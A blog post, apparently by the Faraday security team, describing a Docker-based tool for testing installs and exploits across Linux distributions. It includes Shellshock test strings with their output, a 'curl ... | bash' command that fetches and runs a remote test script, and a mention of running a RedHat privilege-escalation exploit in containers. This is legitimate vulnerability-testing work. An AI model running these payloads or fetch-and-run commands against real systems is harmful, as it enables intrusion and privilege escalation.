Cross Distribution Exploit Testing

Introduction:

Published in

Faraday

5 min readJul 27, 2015

We were looking for an easy way to do testing for the installation of our tool, Faraday
https://github.com/infobyte/faraday with different distributions.

We wanted to do this because the installation process is normally one of the most complicated and critical processes of any new tool being implemented. It is important that the process is easy and that everything works without any hiccups so that users can get started using the tool ASAP and don’t lose valuable time during the installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers, by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel such as cgroups and kernel namespaces to allow independent “containers” to run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines

The process we developed is pretty simple, in which we use a simple list of distributions.

We generate a Docker
We install Faraday
We connect using the SSH to the container, exporting the X and we execute the graphic application (GUI QT)

If one of the processes doesn’t work, we can evaluate what was the cause of the problem and we make a corresponding patch to remedy the problem .

We are using this process daily in our own continuous-integration system.

Cross Distribution Exploit Testing:

Using the same implementation, we can use it to do some exploitation tests in different distributions. This allows us to evaluate different scenarios and hopefully helps us make our exploits a bit more robust :)

Not all the vulnerabilities can be tested using this tool, because kernel’s related problems can
‘t be exploited because Docker isn’t a virtualization system. This includes a few simple vulnerabilities such as file permission, file race condition, environment variable code injection, etc.

The tool contains the following elements:

docker_build.py: This script function is to generate images of each distribution and run docker_launch.py.
docker_launch.py: This is the one that finally connects through the SSH and executes our command in the selected container.
images.txt: A list of images to use
extras/: Libraries and base Dockerfile used for generation of the images.
root/: Here, we find private keys for the ssh connection, which are necessary for testing out the GUI tests.

Case 1 — Shellshock:

A simple example to try would be shellshock:

$ ./docker_build.py -c “env x=’() { :;}; echo vulnerable’ bash -c \”echo this is a test\””

Start build docker: debian:7.3
..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c ‘env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”’ -t fae1bc04-b514_debian:7.3
[‘ssh’, ‘-i’, ‘/root/dev/distro_checker/extras/docker/faraday-docker.prv’, ‘-t’, ‘-t’, ‘-oStrictHostKeyChecking=no’, ‘-o UserKnownHostsFile=/dev/null’, ‘-o LogLevel=quiet’, ‘-X’, u’root@172.17.0.93', ‘env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”’]
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c ‘env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”’ -t a07132a4-af14_ubuntu:14.10
[‘ssh’, ‘-i’, ‘/root/dev/distro_checker/extras/docker/faraday-docker.prv’, ‘-t’, ‘-t’, ‘-oStrictHostKeyChecking=no’, ‘-o UserKnownHostsFile=/dev/null’, ‘-o LogLevel=quiet’, ‘-X’, u’root@172.17.0.94', ‘env x=’() { :;}; echo vulnerable’ bash -c “echo this is a test”’]
this is a test

This creates 2 images (debian7.3, ubuntu 14.10) and for each image, you have to execute the exploit CVE-2014–6271

We can utilize a script to make it a little more organized;

$ ./docker_build.py -c “cd build && ./shellshocker.sh” #docker_build.py copy in the images all the content “.” in the directory ./root/build

Run build docker: debian:7.3, id: 75b78a22–03a1_debian:7.3

CVE-2014–6271 (original shellshock): VULNERABLE

./shellshock_test2.sh: line 17: 29 Segmentation fault shellshocker=”() { x() { _;}; x() { _;} <<a; }” bash -c date 2> /dev/null

CVE-2014–6277 (segfault): VULNERABLE

CVE-2014–6278 (Florian’s patch): VULNERABLE

CVE-2014–7169 (taviso bug): VULNERABLE

CVE-2014–7186 (redir_stack bug): not vulnerable

CVE-2014–7187 (nested loops off by one): not vulnerable

CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable

Also, for a more automated implementation, with the exception that we use the option -i in order to go to a list of images to execute.

$ ./docker_build.py -c “curl https://shellshocker.net/shellshock_test.sh | bash” -i images.txt

In case you want to try testing again something specific for a container all you need to do is run:

$ docker ps -a # verify which is the image generated and use this id with docker_launcher in the option -t

$ ./docker_launcher.py -c “whoami” -t c92d6bf7-d559_debian:7.3

Case 2: Redhat Local Privilege Escalation CVE-2015-(3245,3246):

Last week two vulnerabilities were released that can be use to do a local privilege escalation on

redhat 6 and 7:

CVE-2015–3245 userhelper chfn() newline filtering
CVE-2015–3246 libuser passwd file handling

Let’s try again the tool against this vulnerability in the following distribution rhel6.5', ‘rhel7.0’, ‘rhel7.1’, ‘fedora:20 :

$ ./docker_build.py -i redhat_images.txt -d extras/docker/Dockerfile.redhat -c id # In this scenario I directly use a specific dockerfile that runs the exploit (roothelper.c)

Distros: [‘rhel6.5’, ‘rhel7.0’, ‘rhel7.1’, ‘fedora:20’]
Start build docker: rhel6.5
…
Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE
…
Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
…
Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE
…
Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable
…

Demo:

Clean:

After a few tests, it’s important not forget to stop the containers and delete them:

$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)

You have to for the images as well:
$ docker rmi $(docker images -q)

Tool:

The code can be found on github:
http://github.com/infobyte/distro_checker

To-Do:

Doing a similar process using Vagrant, we would be able to try out all kinds of vulnerabilities, as that would be a complete virtualization setting.

We hope this helps everyone in the need test their tools across a wide range of distributions, from researchers to developers their code.

Thanks Andres for the support!